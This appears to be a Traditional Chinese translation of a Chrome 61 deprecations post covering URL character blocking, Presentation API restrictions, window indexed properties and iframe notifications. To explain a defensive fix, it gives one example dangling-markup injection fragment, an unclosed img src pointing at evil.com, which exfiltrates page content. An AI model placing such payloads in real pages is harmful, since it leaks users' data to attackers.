在幾乎所有版本的 Chrome 中,我們都看到產品、效能和網路平台功能的更新和改善幅度相當顯著。本文將說明 Chrome 61 中淘汰和移除的項目,該版本目前處於 Beta 版階段,截至 8 月 3 日。這份清單內容隨時可能有所變動。
安全性與隱私權
封鎖網址中含有「\n」和「<」字元的資源
有一種駭客攻擊手法稱為「懸空標記插入」,駭客會使用經過截斷的網址,將資料傳送至外部端點。舉例來說,假設某個網頁含有 <img src='https://evil.com/?。由於網址沒有結束引號,瀏覽器會讀取下一個引號,並將所包含的字元視為單一網址。
Chrome 61 會限制 href 和 src 屬性允許使用的字元集,以減輕這個安全漏洞的影響。具體來說,Chrome 會在遇到新行字元 (\n) 和小於字元 (<) 時停止處理網址。
如果開發人員有在網址中使用換行符號和小於字元的正當用途,則應改為轉義這些字元。
Intent to Remove | Chromestatus 追蹤工具 | Chromium 錯誤
在安全性不足的背景中淘汰並移除 Presentation API
我們發現在安全性不高的來源中,Presentation API 可用於安全性不高的來源的駭客攻擊途徑。由於螢幕沒有網址列,因此 API 可用於偽造內容。也可能從正在執行的簡報中竊取資料。
為了配合 Blink 移除不安全來源的強大功能,我們預計淘汰並移除對不安全情境的 Presentation API 支援。自 Chrome 61 版起,PresentationRequest.start() 將不再適用於不安全的來源。
Intent to Remove | Chromestatus 追蹤工具 | Chromium 錯誤
JavaScript
禁止在 Windows 上定義索引屬性
先前,部分瀏覽器允許下列 JavaScript 指派:
window[0] = 1;
目前的 HTML 規格說明指出,這項做法明確違反 JavaScript 規格。因此,Chrome 61 已移除這項功能。自 2016 年 2 月起,Firefox 就已符合規定。
移除從不安全 iframe 使用通知的功能
來自 iframe 的權限要求可能會讓使用者感到困惑,因為他們很難區分包含頁面的來源,以及提出要求的 iframe 來源。如果要求範圍不明確,使用者就很難判斷要授予或拒絕權限。
禁止在 iframe 中顯示通知,也能讓通知權限與推播通知的權限保持一致,讓開發人員更容易操作。
需要這項功能的開發人員可以開啟新視窗,要求通知權限。